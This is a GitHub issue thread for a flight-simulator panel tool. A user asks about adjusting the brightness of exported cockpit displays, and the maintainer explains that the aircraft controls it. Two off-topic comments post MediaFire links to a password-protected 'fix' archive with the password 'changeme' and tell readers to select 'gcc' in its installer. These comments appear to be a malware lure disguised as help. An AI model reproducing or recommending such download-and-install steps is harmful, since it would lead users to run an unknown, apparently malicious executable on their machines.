### ISSUE TITLE
Brightness setting

### ISSUE THREAD

**Issue by Delta-Charlie-DEV** [hawkeye-stan/msfs-popout-panel-manager#127]
Hi, this is not really an issue, more a "is it doable as a new feature" question :-)

So, is it possible to be able to adjust the brigthness of the exported displays ? 

For example, when flying the Fenix A3xx, the exported displays (PFD, ND, ECAMs) are much darker than the in game displays. Off course you can adjust their brightness with the in game BRT rotary switches, but you can't have the same brightness level for in game / out game displays. Could that be sorted out with popout-panel-manager as an option for each exported display ?

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ViniciusSCG** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by hawkeye-stan** [comment]
Unfortunately, brightness control is not adjustable using any external tool since pop out panel's display brightness is controlled by aircraft directly through the game.

**Comment by Delta-Charlie-DEV** [comment]
Thanks for your reply ! Very great tool BTW.
regards,
Denis
